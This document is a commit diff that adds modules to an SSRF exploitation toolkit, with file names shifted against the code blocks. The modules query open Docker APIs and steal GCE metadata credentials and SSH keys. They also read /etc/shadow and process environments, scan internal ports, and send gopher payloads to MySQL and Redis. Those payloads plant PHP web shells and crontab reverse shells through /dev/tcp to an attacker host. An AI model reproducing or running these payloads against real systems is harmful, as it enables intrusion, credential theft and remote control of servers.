Add files via upload

Author: errorfiathck

data/ports.txt

@@ -0,0 +1,54 @@
+from utils.utils import *
+import logging
+import json
+import urllib.parse
+
+# NOTE
+# Enable Remote API with the following command
+# /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
+
+name          = "docker"
+description   = "Docker Infoleaks via Open Docker API"
+author        = "errorfiathck"
+documentation = []
+
+class exploit():
+
+    def __init__(self, requester, args):
+        logging.info(f"Module '{name}' launched !")
+        gen_host = gen_ip_list("127.0.0.1", args.level)
+        port = "2375"
+
+        for ip in gen_host:
+            
+            # Step 1 - Extract id and name from each container
+            data = "containers/json"
+            payload = wrapper_http(data, ip, port)
+            r = requester.do_request(args.param, payload)
+
+            if r.json:
+                for container in r.json():
+                    container_id      = container['Id']
+                    container_name    = container['Names'][0].replace('/','')
+                    container_command = container['Command']
+
+                    logging.info("Found docker container")
+                    logging.info(f"\033[32mId\033[0m : {container_id}")
+                    logging.info(f"\033[32mName\033[0m : {container_name}")
+                    logging.info(f"\033[32mCommand\033[0m : {container_command}\n")
+
+            # Step 2 - Extract id and name from each image 
+            data = "images/json"
+            payload = wrapper_http(data, ip, port)
+            r = requester.do_request(args.param, payload)
+
+            if r.json:
+                images = {}
+                for index, container in enumerate(r.json()):
+                    container_id      = container['Id']
+                    container_name    = container['RepoTags'][0].replace('/','')
+
+                    logging.info(f"Found docker image n°{index}")
+                    logging.info(f"\033[32mId\033[0m : {container_id}")
+                    logging.info(f"\033[32mName\033[0m : {container_name}\n")
+                    images[container_name] = container_id

modules/docker.py

@@ -0,0 +1,59 @@
+from utils.utils import *
+import logging
+import os
+
+name          = "gce"
+description   = "Access sensitive data from GCE"
+author        = "mrtc0"
+documentation = [
+    "https://cloud.google.com/compute/docs/storing-retrieving-metadata",
+    "https://hackerone.com/reports/341876",
+    "https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/"
+]
+
+class exploit():
+    endpoints = set()
+
+    def __init__(self, requester, args):
+        logging.info(f"Module '{name}' launched !")
+        self.add_endpoints()
+
+        r = requester.do_request(args.param, "")
+        if r != None:
+            default = r.text
+
+            # Create directory to store files
+            directory = requester.host
+            # Replace : with _ for window folder name safe
+            # https://www.ibm.com/docs/en/spectrum-archive-sde/2.4.1.0?topic=tips-file-name-characters
+            directory =  directory.replace(':','_')
+            if not os.path.exists(directory):
+                os.makedirs(directory)
+
+            for endpoint in self.endpoints:
+                payload = wrapper_http(endpoint[1], endpoint[0] , "80")
+                r  = requester.do_request(args.param, payload)
+                diff = diff_text(r.text, default)
+                if diff != "":
+
+                    # Display diff between default and ssrf request
+                    logging.info(f"\033[32mReading file\033[0m : {payload}")
+                    print(diff)
+
+                    # Write diff to a file
+                    filename = endpoint[1].split('/')[-1]
+                    if filename == "":
+                        filename = endpoint[1].split('/')[-2:-1][0]
+
+                    logging.info(f"\033[32mWriting file\033[0m : {payload} to {directory + '/' + filename}")
+                    with open(directory + "/" + filename, 'w') as f:
+                        f.write(diff)
+
+
+    def add_endpoints(self):
+        self.endpoints.add( ("metadata.google.internal", "computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json") )
+        self.endpoints.add( ("metadata.google.internal", "computeMetadata/v1beta1/instance/service-accounts/default/token") )
+        self.endpoints.add( ("metadata.google.internal", "computeMetadata/v1beta1/instance/attributes/kube-env?alt=json") )
+        self.endpoints.add( ("metadata.google.internal", "computeMetadata/v1beta1/instance/attributes/?recursive=true&alt=json") )
+
+

modules/gce.py

@@ -0,0 +1,88 @@
+from utils.utils import *
+import logging
+import binascii
+
+# NOTE
+# This exploit is a Python 3 version of the Gopherus tool
+
+name        = "mysql"
+description = "Execute MySQL command < 8.0"
+author      = "errorfiathck"
+documentation = []
+
+
+class exploit():
+    user    = "root"
+    query   = "SELECT database();#"
+    reverse = "select \"<?php system('bash -i >& /dev/tcp/SERVER_HOST/SERVER_PORT 0>&1'); ?>\" INTO OUTFILE '/var/www/html/shell.php'"
+    dios    = "(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#"
+
+
+    def __init__(self, requester, args):
+        logging.info(f"Module '{name}' launched !")
+
+        # Encode the username for the request
+        self.user = input("Give MySQL username: ")
+        encode_user = binascii.hexlify( self.user.encode() )
+        user_length = len(self.user)
+        temp   = user_length - 4
+        length = f'{(0xa3 + temp):x}'
+
+        # Authenticate to MySQL service - only work with users allowed without password
+        dump  = length+ "00000185a6ff0100000001210000000000000000000000000000000000000000000000"
+        dump += encode_user.decode()
+        dump += "00006d7973716c5f6e61746976655f70617373776f72640066035f6f73054c696e75780c5f636c69656e745f6e616d65086c"
+        dump += "69626d7973716c045f7069640532373235350f5f636c69656e745f76657273696f6e06352e372e3232095f706c6174666f726d"
+        dump += "067838365f36340c70726f6772616d5f6e616d65056d7973716c"
+
+        query = input("Give MySQL query to execute (reverse/dios or any SQL statement): ")
+
+        # Reverse shell - writing system() in /var/www/html/shell.php
+        if query == "reverse":
+            self.query = self.reverse
+            if args.lhost == None: 
+                self.query = self.query.replace("SERVER_HOST", input("Server Host:"))
+            else:
+                self.query = self.query.replace("SERVER_HOST", args.lhost)
+
+            if args.lport == None: 
+                self.query = self.query.replace("SERVER_PORT", input("Server Port:"))
+            else:
+                self.query = self.query.replace("SERVER_PORT", args.lport)
+        
+        # Dump in one shot - extract every databases/tables/columns 
+        elif query == "dios":
+            self.query = self.dios
+
+        else:
+            self.query  = query
+
+        auth = dump.replace("\n","")
+
+        # For every IP generated, send the payload and extract the result
+        gen_host = gen_ip_list("127.0.0.1", args.level)
+        for ip in gen_host:
+            payload = self.get_payload(self.query, auth, ip)
+            logging.info(f"Generated payload : {payload}")
+
+            r1 = requester.do_request(args.param, payload)
+            r2 = requester.do_request(args.param, "")
+            if r1 != None and r2!= None:
+                diff = diff_text(r1.text, r2.text)
+                print(diff)
+
+
+    def encode(self, s, ip):
+        a = [s[i:i + 2] for i in range(0, len(s), 2)]
+        return wrapper_gopher("%"+"%".join(a), ip, "3306")
+
+
+    def get_payload(self, query, auth, ip):
+        if(query.strip()!=''):
+            query = binascii.hexlify( query.encode() )
+            query_length = f'{(int((len(query) / 2) + 1)):x}'
+            pay1 = query_length.rjust(2,'0') + "00000003" + query.decode()
+            final = self.encode(auth + pay1 + "0100000001", ip)
+            return final
+        else:
+            return self.encode(auth, ip)

modules/mysql.py

@@ -0,0 +1,50 @@
+from utils.utils import *
+from datetime import datetime
+import logging
+import concurrent.futures
+
+name          = "portscan"
+description   = "Scan ports of the target"
+author        = "errorfiathck"
+documentation = []
+
+class exploit():
+
+    def __init__(self, requester, args):
+        logging.info(f"Module '{name}' launched !")
+        r = requester.do_request(args.param, "")
+
+        load_ports = ""
+        with open("data/ports", "r") as f:
+            load_ports = f.readlines()
+
+        gen_host = gen_ip_list("127.0.0.1", args.level)
+        for ip in gen_host:
+            with concurrent.futures.ThreadPoolExecutor(max_workers=None) as executor:
+                future_to_url = {executor.submit(self.concurrent_request, requester, args.param, ip, port, r): port for port in load_ports}
+
+
+    def concurrent_request(self, requester, param, host, port, compare):
+        try:
+            payload = wrapper_http("", host, port.strip())
+            r = requester.do_request(param, payload)
+
+            if r != None and not "Connection refused" in r.text:
+                timer = datetime.today().time().replace(microsecond=0)
+                port = port.strip() + " "*20
+
+                if r.text != '' and r.text != compare.text:
+                    print(f"\t[{timer}] IP:{host:12s}, Found \033[32mopen     \033[0m port n°{port}")
+                else:
+                    print(f"\t[{timer}] IP:{host:12s}, Found \033[31mfiltered\033[0m  port n°{port}")
+
+            timer = datetime.today().time().replace(microsecond=0)
+            port = port.strip() + " "*20
+            print(f"\t[{timer}] Checking port n°{port}", end='\r'),
+        
+        except Exception as e:
+            print(e)
+            timer = datetime.today().time().replace(microsecond=0)
+            port = port.strip() + " "*20
+            print(f"\t[{timer}] IP:{host:212}, \033[33mTimed out\033[0m  port n°{port}")
+            pass

modules/portscan.py

@@ -0,0 +1,50 @@
+from utils.utils import *
+import logging
+import os
+from argparse import ArgumentParser
+
+name          = "readfiles"
+description   = "Read files from the target"
+author        = "Swissky"
+documentation = []
+
+class exploit():
+    
+    def __init__(self, requester, args):
+        logging.info(f"Module '{name}' launched !")
+        self.files = args.targetfiles.split(',') if args.targetfiles != None else ["/etc/passwd", "/etc/lsb-release", "/etc/shadow", "/etc/hosts", "\/\/etc/passwd", "/proc/self/environ", "/proc/self/cmdline", "/proc/self/cwd/index.php", "/proc/self/cwd/application.py", "/proc/self/cwd/main.py", "/proc/self/exe"]   
+        self.file_magic = {'elf' : bytes([0x7f, 0x45, 0x4c, 0x46])}
+        
+        r = requester.do_request(args.param, "")
+        
+        if r != None:
+            default = r.text
+
+            # Create directory to store files
+            directory = requester.host
+            # Replace : with _ for window folder name safe
+            # https://www.ibm.com/docs/en/spectrum-archive-sde/2.4.1.0?topic=tips-file-name-characters
+            directory =  directory.replace(':','_')
+            if not os.path.exists(directory):
+                os.makedirs(directory)
+
+            for f in self.files:
+                r  = requester.do_request(args.param, wrapper_file(f))
+                diff = diff_text(r.text, default)
+                if diff != "":
+
+                    # Display diff between default and ssrf request
+                    logging.info(f"\033[32mReading file\033[0m : {f}")
+                    if bytes(diff, encoding='utf-8').startswith(self.file_magic["elf"]):
+                        print("ELF binary found - not printing to stdout")
+                    else:
+                        print(diff)
+
+                    # Write diff to a file
+                    filename = f.replace('\\','_').replace('/','_')
+                    logging.info(f"\033[32mWriting file\033[0m : {f} to {directory + '/' + filename}")
+                    with open(directory + "/" + filename, 'w') as f:
+                        f.write(diff)
+
+        else:
+            print("Empty response")

modules/readfiles.py

@@ -0,0 +1,59 @@
+from utils.utils import *
+import logging
+
+name        = "redis"
+description = "Redis RCE - Crontab reverse shell"
+author      = "errorfiathck"
+documentation = []
+
+class exploit():
+    SERVER_HOST = "127.0.0.1"
+    SERVER_PORT = "4242"
+    SERVER_CRON = "/var/lib/redis"
+
+    def __init__(self, requester, args):
+        logging.info(f"Module '{name}' launched !")
+
+        # Handle args for reverse shell
+        if args.lhost == None: self.SERVER_HOST = input("Server Host:")
+        else:                  self.SERVER_HOST = args.lhost
+
+        if args.lport == None: self.SERVER_PORT = input("Server Port:")
+        else:                  self.SERVER_PORT = args.lport
+
+        self.SERVER_CRON = input("Server Cron (e.g:/var/spool/cron/):")
+        self.LENGTH_PAYLOAD = 65 - len("SERVER_HOST") - len("SERVER_PORT")
+        self.LENGTH_PAYLOAD = self.LENGTH_PAYLOAD + len(str(self.SERVER_HOST))
+        self.LENGTH_PAYLOAD = self.LENGTH_PAYLOAD + len(str(self.SERVER_PORT))
+
+        # Using a generator to create the host list
+        # Edit the following ip if you need to target something else
+        gen_host = gen_ip_list("127.0.0.1", args.level)
+        for ip in gen_host:
+
+            # Data and port for the service
+            port = "6379"
+            data = "*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$LENGTH_PAYLOAD%0d%0a%0d%0a%0a%0a*/1%20*%20*%20*%20*%20bash%20-i%20>&%20/dev/tcp/SERVER_HOST/SERVER_PORT%200>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0aSERVER_CRON%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a"
+            payload = wrapper_gopher(data, ip , port)
+
+            # Handle args for reverse shell
+            payload = payload.replace("SERVER_HOST", self.SERVER_HOST)
+            payload = payload.replace("SERVER_PORT", self.SERVER_PORT)
+            payload = payload.replace("SERVER_CRON", self.SERVER_CRON)
+            payload = payload.replace("LENGTH_PAYLOAD", str(self.LENGTH_PAYLOAD))
+
+            if args.verbose == True:
+                logging.info(f"Generated payload : {payload}")
+                
+            # Send the payload
+            r = requester.do_request(args.param, payload)
+
+            if args.verbose == True:
+                logging.info(f"Module '{name}' ended !")
+
+"""
+TODO:
+This exploit only works if you have control over a cron file.
+Command execution via PHP file is not implemented, a simple example is the following.
+gopher://127.0.0.1:6379/_FLUSHALL%0D%0ASET%20myshell%20%22%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%3F%3E%22%0D%0ACONFIG%20SET%20DIR%20%2fwww%2f%0D%0ACONFIG%20SET%20DBFILENAME%20shell.php%0D%0ASAVE%0D%0AQUIT
+"""